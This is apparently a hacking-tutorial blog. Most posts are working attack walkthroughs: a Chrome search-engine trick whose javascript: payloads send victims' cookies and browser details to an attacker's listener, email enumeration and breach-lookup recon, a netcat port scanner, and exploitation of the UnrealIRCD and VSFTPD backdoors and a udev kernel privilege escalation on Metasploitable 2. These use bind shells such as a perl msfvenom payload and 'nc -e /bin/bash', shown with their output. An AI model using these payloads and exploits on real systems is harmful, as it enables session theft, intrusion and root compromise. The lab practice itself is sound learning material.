metalkey

Hacking tutorials + info

Mousejack on the WiFi Pineapple

June 15, 2018

The Mousejack attack is extremely useful for dropping payloads on machines where vulnerable RF wireless devices are used and after a bit of trial and error, it was possible to get the Jackit exploit tool running on a WiFi Pineapple.
Commands to get things up and running below.

Note: It is also possible to run Jackit on the Nano but it requires moving Python to an external SD card first.

root@pineapple:~$ opkg update
root@pineapple:~$ opkg install python-pip libusb-1.0 libusb-compat
root@pineapple:~$ pip install pyusb click six tabulate
...
Download jackit from https://github.com/Sliim/jackit/tree/openwrt-libusb
Modify jackit as per master...Sliim:openwrt-libusb (e.g. wget https://raw.githubusercontent.com/Sliim/jackit/4de42c5d9cdae2ed1009b8cd161101e88ab1c76a/jackit/lib/nrf24.py)
...
root@pineapple:~$ ./setup.py build
root@pineapple:~$ ./setup.py install

Jackit Github Page:
https://github.com/insecurityofthings/jackit

Tags: wifi

Google Chrome Search Poison – Default Search Engine Exploit

August 27, 2017

Introduction

In December 2015, I discovered a vulnerability in Google Chrome's default search engines feature allowing for the execution of malicious JavaScript whenever the victim performs a search using the omnibox (i.e. URL textbox).
The malicious JavaScript can be set to perform various functions including: Cookie Stealing, Search Keywords Interception, Browser Fingerprinting, etc...
In this walkthrough we'll set up a Python SimpleHTTPServer and intercept the victim’s Cookies and search keywords.

Note: The vulnerability was reported to the Google/Chromium team but was considered a feature rather than a vulnerability.

Video Demo

The video demonstration involves manipulation of the chrome master-preferences file to infect the user with the malicious search engine. The user is then directed to the attackers apache server, which extracts the search query, cookies and other system information and seamlessly directs them back to their search.

Walkthrough - Setting up the Listener in Kali

root@kali:~$ python -m SimpleHTTPServer 80

Setup on Victim Machine

  1. Go into "Settings" in Google Chrome
  2. Click on "Manage Search Engines"
  3. Enter your malicious JS and click "Make Default"

Example

javascript:window.location='http://192.168.1.182/%s'+escape(document.cookie);

Note: 192.168.1.182 is our SimpleHTTPServer.
Now whenever the victim searches using Google Chrome’s Omnibox, the malicious JS will trigger, forwarding you their cookie and search string (%s).

Other examples

javascript:window.location=’http://192.168.1.182/%s ‘+escape(document.cookie);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(document.baseURI);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(document.domain);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(document.URL);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(location.host);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(navigator.appCodeName);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(navigator.appName);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(navigator.appVersion);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(navigator.platform);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(navigator.userAgent);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(navigator.platform);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(navigator.product);

Tags: search-poison

Company Email Enumeration + Breached Email Finder

October 24, 2016 — metalkey
Enumerating email addresses for a target domain and checking if these emails appear in known breaches can be extremely useful when performing recon.
This script will use hunter.io to enumerate domain emails and feed them into hacked-emails.com to check if they appear in known breaches.

Note: Substitute YOURAPIKEY with your hunter.io API key. This can be obtained by creating a hunter.io account.

root@kali:~# cat emails.sh
#!/bin/bash
rm found-emails.txt
rm hacked-emails.txt
clear
echo -e "\e[92mEnter Target Domain:"
echo -e "\e[39m"
read hname
clear
echo -e "[+] Email Recon Started"
echo -e "\e[39m"

# Email Checks
echo "- Enumerating Domain Emails"
curl -k -s "https://api.emailhunter.co/v1/search?domain=$hname&api_key=YOURAPIKEY" | grep -Po '"value" :.*?[^\\]",' | cut -d'"' -f4 > found-emails.txt
echo "Found the following emails:"
cat found-emails.txt
echo ""
echo "[+] Checking if Emails have been breached"
for email in $(cat found-emails.txt);do
curl -k -s "https://hacked-emails.com/api?q=$email" | grep '"status":"found"' | cut -d'"' -f8 >> hacked-emails.txt &
done
wait
echo "The following email addresses appear in known breaches:"
cat hacked-emails.txt

echo -e "\e[39m"
echo -e "[*] Please wait..."
wait
echo -e "[END] Email Recon Complete!"
echo -e ""

Tags: recon

Installing Wickr on Ubuntu 16.04

October 22, 2016 — metalkey

Download Wickr and Dependencies

user@ubuntu~$ wget https://dls.wickr.com/Downloads/wickr-me_2.6.0_amd64.deb
user@ubuntu~$ wget http://security.ubuntu.com/ubuntu/pool/universe/liba/libav/libavutil52_9.18-0ubuntu0.14.04.1_amd64.deb
user@ubuntu~$ wget http://mirrors.kernel.org/ubuntu/pool/main/i/icu/libicu52_52.1-8ubuntu0.2_amd64.deb
user@ubuntu~$ wget http://mirrors.kernel.org/ubuntu/pool/universe/x/x264/libx264-142_0.142.2389+git956c8d8-2_amd64.deb

Install Dependencies and Wickr

user@ubuntu~$ sudo dpkg -i libavutil52_9.18-0ubuntu0.14.04.1_amd64.deb
user@ubuntu~$ sudo dpkg -i libicu52_52.1-8ubuntu0.2_amd64.deb
user@ubuntu~$ sudo dpkg -i libx264-142_0.142.2389+git956c8d8-2_amd64.deb
user@ubuntu~$ sudo dpkg -i wickr-me_2.6.0_amd64.deb
user@ubuntu~$ wickr-me

Tags: privacy

Port Scanning With Netcat (Up to 1000 ports/second)

October 08, 2016 — metalkey

nano catscan.sh
#!/bin/bash
mkdir catscan-results
cp targets.txt catscan-results
cd catscan-results

# Use ping to get IP addresses. Strip bash colours from output with sed
echo "Generating IP list..."
for host in $(cat targets.txt);do
hostip=`ping -c 1 -W 1 $host | grep PING | cut -d"(" -f2 | cut -d")" -f1 | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g"`
echo "$host resolves to $hostip"
echo "$host resolves to $hostip" >> host-ip.txt
echo $hostip >> temp-hosts.txt
done
wait

# Sort ips and remove dupes
sort -u temp-hosts.txt > hosts.txt
rm temp-hosts.txt

echo "Starting scan..."
# Scan y ports at a time and ouput to results.txt
# To change number of ports scanned at a time, change y, x incrementer, y incrementer
for ip in $(cat hosts.txt);do
x=0
y=1000
while [ $y -le 66000 ];do
echo "Scanning $ip (Ports $x - $y)"
for num in $(seq $x $y);do
netcat -vzn -w 1 $ip $num >> results.txt 2>&1 &
done
wait
x=$(( $x + 1000 ))
y=$(( $x + 1000 ))
grep $ip results.txt | grep " open" results.txt | sort -u
done
done
grep $ip results.txt | grep " open" results.txt | sort -u > open-ports.txt

Tags: port-scanning

UnrealIRCD 3.2.8.1 Backdoor Command Execution

July 02, 2016 — metalkey
Attacker: Kali Linux
Victim: Metasploitable 2

Unreal IRCD 3.2.8.1 contains a backdoor that is triggered by entering AB; upon connecting. The backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.

The following example demonstrates it’s use on Metasploitable 2 (192.168.1.142).

Generating the Payload

We’re going to generate a unix bind shell with msfvenom (port 4444) and connect to this with Netcat.

root@kali:~$ msfvenom -p cmd/unix/bind_perl --payload-options
root@kali:~$ msfvenom -p cmd/unix/bind_perl LHOST=192.168.1.142
No platform was selected, choosing Msf::Module::Platform::Unix from the payload
No Arch selected, selecting Arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 240 bytes
perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(){if($_=~ /(.*)/){system $1;}};'

Triggering the Exploit

root@kali:~$ nc -vn 192.168.1.142 6667
(UNKNOWN) [192.168.1.142] 6667 (ircd) open
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
AB;perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(){if($_=~ /(.*)/){system $1;}};'
:irc.Metasploitable.LAN 451 AB;perl :You have not registered

Connecting to the Netcat Bind Shell

root@kali:~$ nc -vn 192.168.1.142 4444
(UNKNOWN) [192.168.1.142] 4444 (?) open
python -c "import pty;pty.spawn('/bin/bash')"
root@metasploitable:/etc/unreal#

Tags: backdoors

VSFTPD v2.3.4 Backdoor Command Execution

July 02, 2016 — metalkey
Attacker: Kali Linux
Victim: Windows 10

VSFTPD v2.3.4 contains a backdoor that is triggered by entering anystring:) as the username (no password required). After the backdoor is triggered, the target machine opens a shell on port 6200.

This example demonstrates it’s use on Metasploitable 2 (192.168.1.142).

Triggering the Backdoor

root@kali:~$ ftp 192.168.1.142
Connected to 192.168.1.142.
220 (vsFTPd 2.3.4)
Name (192.168.1.142:root):123456:)
331 Please specify the password.
Password: [Enter]
[CTRL+C]
421 Service not available, remote server has closed connection

Connecting to the Shell

root@kali:~$ nc -vn 192.168.1.142 6200
(UNKNOWN) [192.168.1.142] 6200 (?) open
python -c "import pty;pty.spawn('/bin/bash')"
root@metasploitable:/#

Tags: backdoors

Linux Kernel 2.6 UDEV < 141 – Local Privilege Escalation Exploit Example

July 02, 2016 — metalkey
Attacker: Kali Linux
Victim: Metasploitable 2

Note: This exploit leverages a vulnerability in NETLINK.
More information on NETLINK can be found on the Linux Foundation website (http://www.linuxfoundation.org/collaborate/workgroups/networking/generic_netlink_howto).

Download the Exploit from ExploitDB

Head over to the Exploit Database and download Jon Oberheide’s udev exploit for Linux Kernel 2.6 (https://www.exploit-db.com/exploits/8572/).

Telnet to Metasploitable 2, then Upload and Compile the Exploit

Telnet to Metasploitable 2 then start a netcat listener.
In Kali, We’re going to tar the exploit and pipe the output to netcat.
In Metasploitable 2, we’re going to receive and untar the exploit, then compile it with gcc.

root@kali:~$ telnet 192.168.1.10
Trying 192.168.1.10...
Connected to 192.168.1.10.

Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started
metasploitable login: msfadmin
Password: msfadmin
Linux metasploitable 2.6.24-16-server #1 SMP i686

msfadmin@metasploitable:~$ nc -lvp 12345 | tar -xf -
listening on [any] 12345 ...

Open a new tab, tar the exploit and pipe the output to netcat

root@kali:~$ tar -cf - 8572.c | nc -vn 192.168.1.10 12345
(UNKNOWN) [192.168.1.10] 12345 (?) open

Back in the first tab we can see our Kali Machine connect.
Allow a few seconds for the file transfer to complete then CTRL+C to end the session.
Check the exploit has been received, then compile with gcc.

connect to [192.168.1.10] from kali [192.168.1.182] 48411
msfadmin@metasploitable:~$ ls -lah 8572.c
-rw-r--r-- 1 msfadmin msfadmin 2.9K 2015-11-05 04:14 8572.c
msfadmin@metasploitable:~$ gcc 8572.c -o 8572

Executing the Exploit

Now we just need to get the PID of the the udevd netlink socket on Metasploitable 2, create our run script (bind an instance of bash to a netcat listener) and execute the exploit

msfadmin@metasploitable:~$ cat /proc/net/netlink
df552800 15 2738 00000001 0 0 00000000 2
msfadmin@metasploitable:~$ cd /tmp
msfadmin@metasploitable:/tmp$ nano run
#!/bin/bash
nc -lvvp 2345 -e /bin/bash
msfadmin@metasploitable:/tmp$ cd
msfadmin@metasploitable:~$ ./8572 2738

Open a new tab and connect to the bind shell

root@kali:~$ nc -vn 192.168.1.10 2345
(UNKNOWN) [192.168.1.10] 2345 (?) open
python -c "import pty;pty.spawn('/bin/bash')"
root@metasploitable:/# whoami
root

Tags: privilege-escalation